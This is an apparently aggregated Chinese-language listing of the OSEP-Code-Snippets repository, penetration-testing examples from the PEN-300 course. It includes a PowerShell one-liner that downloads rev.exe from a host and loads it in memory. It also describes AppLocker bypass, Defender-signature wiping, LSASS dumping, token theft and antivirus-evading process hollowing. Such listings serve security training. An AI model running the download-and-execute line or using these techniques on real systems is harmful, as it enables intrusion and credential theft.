OSEP-Code-Snippets

OSEP-Code-Snippets

OSEP课程相关的渗透测试代码片段库

OSEP-Code-Snippets是一个基于Offensive Security PEN-300课程的代码示例集合。项目包含AppLocker绕过、无文件横向移动和Linux shellcode编码器等渗透测试工具,使用C#、PowerShell、Python和VBA等语言实现。代码示例涉及shellcode运行、进程注入和令牌窃取等高级技术,为信息安全专业人士提供学习和实践资源。所有代码均按原样提供,不含任何形式的保证。

OSEP代码片段shellcodePowerShell进程注入Github开源项目

OSEP 代码片段

代码示例按原样提供,不附带任何形式的保证。基于 Offensive Security 的 PEN-300 课程。

类和方法都是公开的,所以大多数二进制文件应该允许如下反射加载。

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe') $assem = [System.Reflection.Assembly]::Load($data) [rev.Program]::Main("".Split())

目录

片段名称描述
AppLocker 绕过 PowerShell 运行空间 (C#)使用 CertUtilBitsAdminInstallUtil 组合的 AppLocker 绕过基础二进制文件。详情请参阅 README.md
无文件横向移动 (C#)在远程主机上擦除 Windows Defender 签名,并使用类似 PSExec 的方法(但使用现有进程)实现横向移动。接受目标、目标服务和要运行的目标二进制文件的参数。注意应选择非关键服务,如 SensorService
Linux shellcode 编码器 (Python)用于从 Linux 编码 C# 有效载荷的实用脚本,可以接收原始 shellcode 有效载荷(.bin),或自动从 'msfvenom' 输入。支持使用任意密钥进行 XOR 和 ROT 编码,并打印解码函数。可用于替换 C# ROT/XOR 编码器脚本。
Linux shellcode 加载器 (C)各种基于 C 的 shellcode 加载器,包括用于库劫持的基础二进制文件。
MiniDump (C# & PS1)将 LSASS 转储到 C:\Windows\Tasks\lsass.dmp 的简单二进制文件。还提供了原生 PowerShell 脚本版本。
MSSQL (C#)包含各种讨论过的 MSSQL 交互的示例二进制文件。根据需要更改代码以仅包含所需内容。
PrintSpoofer.NET (C#)窃取使用 PrintSpooler 漏洞 强制传入的身份验证令牌,并使用该令牌运行给定的二进制文件。经修改后无需交互式登录会话。接受管道名称和要运行的二进制文件的参数。
ROT shellcode 编码器 (C#)应用最先进的 ROT 编码来混淆 shellcode 的简单二进制文件。接受旋转次数的参数。
Sections shellcode 进程注入器 (C#)使用 NtCreateSectionNtMapViewOfSectionNtUnMapViewOfsectionNtClose 而不是"标准"方法来注入和运行 shellcode。
Shellcode 进程虚化 (C#)虚化一个 svchost 进程并从那里运行 shellcode。在编写时在 VirusTotal 上得分为 0/68。
Shellcode 进程注入器 (C# & PS1)应用进程注入的简单 shellcode 运行器。接受要注入的进程参数。如果未给出参数,则尝试根据权限级别选择合适的进程。还提供了原生 PowerShell 脚本版本(虽然稍微简单一些)。
简单 Shellcode 运行器 (C# & PS1 & VBA)最简单的 shellcode 运行器。还提供了原生 PowerShell 和 VBA 脚本版本。
XOR shellcode 编码器 (C#)应用最先进的 XOR 编码来混淆 shellcode 的简单二进制文件。

编辑推荐精选

博思AIPPT

博思AIPPT

AI一键生成PPT,就用博思AIPPT!

博思AIPPT,新一代的AI生成PPT平台,支持智能生成PPT、AI美化PPT、文本&链接生成PPT、导入Word/PDF/Markdown文档生成PPT等,内置海量精美PPT模板,涵盖商务、教育、科技等不同风格,同时针对每个页面提供多种版式,一键自适应切换,完美适配各种办公场景。

AI办公办公工具AI工具博思AIPPTAI生成PPT智能排版海量精品模板AI创作热门
潮际好麦

潮际好麦

AI赋能电商视觉革命,一站式智能商拍平台

潮际好麦深耕服装行业,是国内AI试衣效果最好的软件。使用先进AIGC能力为电商卖家批量提供优质的、低成本的商拍图。合作品牌有Shein、Lazada、安踏、百丽等65个国内外头部品牌,以及国内10万+淘宝、天猫、京东等主流平台的品牌商家,为卖家节省将近85%的出图成本,提升约3倍出图效率,让品牌能够快速上架。

iTerms

iTerms

企业专属的AI法律顾问

iTerms是法大大集团旗下法律子品牌,基于最先进的大语言模型(LLM)、专业的法律知识库和强大的智能体架构,帮助企业扫清合规障碍,筑牢风控防线,成为您企业专属的AI法律顾问。

SimilarWeb流量提升

SimilarWeb流量提升

稳定高效的流量提升解决方案,助力品牌曝光

稳定高效的流量提升解决方案,助力品牌曝光

Sora2视频免费生成

Sora2视频免费生成

最新版Sora2模型免费使用,一键生成无水印视频

最新版Sora2模型免费使用,一键生成无水印视频

Transly

Transly

实时语音翻译/同声传译工具

Transly是一个多场景的AI大语言模型驱动的同声传译、专业翻译助手,它拥有超精准的音频识别翻译能力,几乎零延迟的使用体验和支持多国语言可以让你带它走遍全球,无论你是留学生、商务人士、韩剧美剧爱好者,还是出国游玩、多国会议、跨国追星等等,都可以满足你所有需要同传的场景需求,线上线下通用,扫除语言障碍,让全世界的语言交流不再有国界。

讯飞绘文

讯飞绘文

选题、配图、成文,一站式创作,让内容运营更高效

讯飞绘文,一个AI集成平台,支持写作、选题、配图、排版和发布。高效生成适用于各类媒体的定制内容,加速品牌传播,提升内容营销效果。

热门AI辅助写作AI工具讯飞绘文内容运营AI创作个性化文章多平台分发AI助手
TRAE编程

TRAE编程

AI辅助编程,代码自动修复

Trae是一种自适应的集成开发环境(IDE),通过自动化和多元协作改变开发流程。利用Trae,团队能够更快速、精确地编写和部署代码,从而提高编程效率和项目交付速度。Trae具备上下文感知和代码自动完成功能,是提升开发效率的理想工具。

AI工具TraeAI IDE协作生产力转型热门
商汤小浣熊

商汤小浣熊

最强AI数据分析助手

小浣熊家族Raccoon,您的AI智能助手,致力于通过先进的人工智能技术,为用户提供高效、便捷的智能服务。无论是日常咨询还是专业问题解答,小浣熊都能以快速、准确的响应满足您的需求,让您的生活更加智能便捷。

imini AI

imini AI

像人一样思考的AI智能体

imini 是一款超级AI智能体,能根据人类指令,自主思考、自主完成、并且交付结果的AI智能体。

下拉加载更多